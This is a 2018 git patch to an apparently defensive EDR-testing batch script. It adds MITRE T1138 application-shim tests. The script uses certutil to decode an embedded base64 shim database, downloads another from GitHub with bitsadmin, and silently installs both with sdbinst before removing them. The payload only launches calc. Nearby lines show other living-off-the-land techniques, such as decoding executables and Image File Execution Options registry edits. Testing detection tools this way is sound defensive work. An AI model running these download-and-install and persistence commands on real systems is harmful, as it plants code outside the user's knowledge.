From f16c22ccfad662fb3632c5b3a16351ee7bd3b083 Mon Sep 17 00:00:00 2001
From: op7ic <3172590+op7ic@users.noreply.github.com>
Date: Thu, 19 Jul 2018 12:49:00 +0100
Subject: [PATCH] shim test

---
 Payloads/calc-exec.sdb | Bin 0 -> 1024 bytes
 README.md              |   4 ++--
 runtests.bat           |  52 ++++++++++++++++++++++++++++++++++++++++-
 3 files changed, 53 insertions(+), 3 deletions(-)
 create mode 100644 Payloads/calc-exec.sdb

diff --git a/Payloads/calc-exec.sdb b/Payloads/calc-exec.sdb
new file mode 100644
index 0000000000000000000000000000000000000000..159c8277017ce487d1c95367a5bda330db21cf98
GIT binary patch
literal 1024
zcmah{O=}ZT6uoaU=A)?+V-%69gBH}%gfwZ>#8pB}7g9B(sNMOdnM5KseIx}(M5%Ps
zWmeLSpi4K3%jQSajfJkH;9B%2c<xP88Y#HAhkMUG_iNr*M5JI{Z>4GZKi~y?2WaI(
zCXiS9LXop-dmLC<uB6I~rE(2az&~@OifXluV1#r2;cV$Psyhwtd~wJnq+e`g>hZ2|
zWP-g>HFI`vxZ^;5N&4{iHq^ZLRKK*7n6bX_-pU++QPs$8d;H<m@9LTka;ztS*X7nw
zF9!ej-o&@Jjosph>5X5>-S&=UKvL9P0V>Tw#0)Aoj`@A~A@c^P^gb{s%2WCed|Uc{
z+Wh!FTj(rq77iwFgw4;e$%uLkyG3*Y7}E>Dv-%y-sy@5(^|GQM1&+LPy3bm}mnqE?
z!!j#+xKG>y?@uyr@g*5b(F`mN%W}=uec&sqQxklhJes2h{3PYz<-sLs7V0|KB)RZ1
z@RP`-!FY%~$>k8OP=Q`c&oN*f>gPb7F$*j~=~0zBv?di@>LPLxyR?exbyx@70;*hk
z3Xdx<0&6m<g=_<r>r|m-7-!?a;hYq*K8$((d+t#SIiA*qHBrYI8#pE2^obgW%20R6
z2)d|h!D~y!-4iQ5lS7Z8YU8>!dVy)oJU|D&XV9UIdmLJ#m&o#+tJ07Ep4{Pk%)?8|
z%Vh8_{KW^aQ~Qs`p_`b=)92CKpu-b<KM#}now;WgZ#0J&OG}idTQZx!+#}TSJ}x$^
HLQV7+oywkD

literal 0
HcmV?d00001

diff --git a/README.md b/README.md
index e927a15..d408e54 100644
--- a/README.md
+++ b/README.md
@@ -51,10 +51,10 @@ The following techniques are currently covered by this script:
 | T1096  | PresentationHost.exe | DISK\CERTUTIL |
 | T1055  | Command Processor Registry | |
 | T1015  | gpup.exe | |
-| | VBoxDrvInst | | 
+| T1138  | VBoxDrvInst | | 
 | | InstallHinfSection | |
 | | Atbroker | |
 | | msconfig | |
 | | dnscmd | | 
 | | java.exe | | 
-| | WseClientSvc.exe | |
\ No newline at end of file
+| | WseClientSvc.exe | |
diff --git a/runtests.bat b/runtests.bat
index 8adb53c..082f7c4 100644
--- a/runtests.bat
+++ b/runtests.bat
@@ -325,6 +325,54 @@ echo Command Excuted: C:\windows\system32\setsh.bac C:\windows\system32\setsh.ex
 
 timeout 5
 
+echo %time% %date% [+] T1138 - App Shim installation for Calc.exe via file decode
+echo -----BEGIN CERTIFICATE----- > shim.64
+echo AgAAAAEAAABzZGJmAnjeAAAAA3ggAAAAAjgHcAM4AWAWQAEAAAABmAwAAABFWEUu >> shim.64
+echo Q0xBQ1IBAAADeA4AAAACOAdwAzgLYAGYAAAAAAN4DgAAAAI4B3ADOCBgAZgAAAAA >> shim.64
+echo A3gOAAAAAjgEcAM4AWABmAAAAAADeA4AAAACOA1wAzgVQAGYAAAAAAN4FAAAAAI4 >> shim.64
+echo EHADOAFgFkABAAAAAZgAAAAAA3gOAAAAAjgScAM4BpABmAAAAAADeBQAAAACOBJw >> shim.64
+echo AzgEkBZAAQAAAAGYAAAAAAN4GgAAAAI4B3ADOASQAZgMAAAAKrpBuRQxAq9SAQAA >> shim.64
+echo AXDgAAAAAVAJOgQMVR/UASJgBgAAAAFgHAAAACNAAQAAAAeQEAAAAO/VHM+BZc5A >> shim.64
+echo oCyA7S3ObrkCcAAAAAALcB4AAAABYHAAAAAJcAYAAAABYIAAAAAJcAYAAAABYLoA >> shim.64
+echo AAAHcH4AAAABYNgAAAAGYHAAAAAFYPAAAAAEkBAAAACpg6GdMzlyTIM54CQnCHDj >> shim.64
+echo CHAyAAAAAWAKAQAACWAUAQAAEGBGAQAAEWCWAQAAAlBqRLEdAQAGAANQakSxHQEA >> shim.64
+echo BgATYLoBAAAJcAwAAAABYLoAAAAIYNgAAAALcAYAAAABYBICAAABeCQCAAABiBAA >> shim.64
+echo AAAyAC4AMQAuADAALgAzAAAAAYhOAAAAewBjAGYAMQBjAGQANQBlAGYALQA2ADUA >> shim.64
+echo OAAxAC0ANAAwAGMAZQAtAGEAMAAyAGMALQA4ADAAZQBkADIAZABjAGUANgBlAGIA >> shim.64
+echo OQB9AAAAAYgKAAAAYwBhAGwAYwAAAAGINAAAAEEAZABkAFAAcgBvAGMAZQBzAHMA >> shim.64
+echo UABhAHIAYQBtAGUAdABlAHIAcwBGAGwAYQBnAHMAAAABiBgAAABSAGUAZABpAHIA >> shim.64
+echo ZQBjAHQARQBYAEUAAAABiBIAAABjAGEAbABjAC4AZQB4AGUAAAABiBQAAABNAGkA >> shim.64
+echo YwByAG8AcwBvAGYAdAAAAAGIBAAAACoAAAABiCwAAABNAGkAYwByAG8AcwBvAGYA >> shim.64
+echo dAAgAEMAbwByAHAAbwByAGEAdABpAG8AbgAAAAGISgAAAE0AaQBjAHIAbwBzAG8A >> shim.64
+echo ZgB0AK4AIABXAGkAbgBkAG8AdwBzAK4AIABPAHAAZQByAGEAdABpAG4AZwAgAFMA >> shim.64
+echo eQBzAHQAZQBtAAAAAYgeAAAANgAuADEALgA3ADYAMAAxAC4AMgAzADQAMAAzAAAA >> shim.64
+echo AYhSAAAANgAuADEALgA3ADYAMAAxAC4AMgAzADQAMAAzACAAKAB3AGkAbgA3AHMA >> shim.64
+echo cAAxAF8AbABkAHIALgAxADYAMAAzADIANQAtADAANgAwADAAKQAAAAGIEgAAAFYA >> shim.64
+echo aQBzAHQAYQBTAFAAMQAAAA== >> shim.64
+echo -----END CERTIFICATE----- >> shim.64
+start "" cmd /c certutil -f -decode shim.64 calc.sdb >nul
+start "" cmd /c sdbinst /q calc.sdb
+timeout 2
+start "" cmd /c sdbinst -u calc.sdb
+echo Execution Finished at %time% %date% 
+echo Command Excuted: certutil -f -decode shim.64 calc.sdb
+echo Command Excuted: sdbinst -q calc.sdb
+echo Command Excuted: sdbinst -u calc.sdb
+
+timeout 5
+
+echo %time% %date% [+] T1138 - App Shim installation for Calc.exe via file download
+
+start "" cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/calc-exec.sdb "%cd%\calc2.sdb"
+start "" cmd /c sdbinst /q calc2.sdb
+timeout 2
+start "" cmd /c sdbinst -u calc2.sdb
+echo Execution Finished at %time% %date% 
+echo Command Excuted: sdbinst -q calc2.sdb
+echo Command Excuted: sdbinst -u calc2.sdb
+
+timeout 5
+
 
 echo **********************************************
 echo *      Testing LOLBAS PAYLOADS               *
@@ -404,6 +452,7 @@ echo Execution Finished at %time% %date%
 echo Command Excuted: [InternetShortcut] > C:\windows\temp\url.url
 echo Command Excuted: URL=file:///c:\windows\system32\calc.exe >> C:\windows\temp\url.url
 echo Command Excuted: rundll32.exe shdocvw.dll, OpenURL C:\windows\temp\url.url
+
 timeout 5
 
 echo %time% %date% [+] Testing csc exec
@@ -666,7 +715,6 @@ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b6
 echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pass.b64
 echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= >> pass.b64
 echo -----END CERTIFICATE----- >> pass.b64
-
 start "" cmd /c certutil -f -decode pass.b64 pass_TestBin.exe >nul
 start "" cmd /c WseClientSvc.exe pass_TestBin.exe calc.exe
 echo Execution Finished at %time% %date%
@@ -866,6 +914,8 @@ start "" cmd /c del testADS.txt
 start "" cmd /c del C:\windows\temp\url.url
 start "" cmd /c del Default_File_Path2.ps1
 start "" cmd /c del notepad.msi
+start "" cmd /c del shim.64
+start "" cmd /c del calc2.sdb
 start "" cmd /c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\paint.exe" /f
 start "" cmd /c reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /f
 start "" cmd /c sc delete evilservice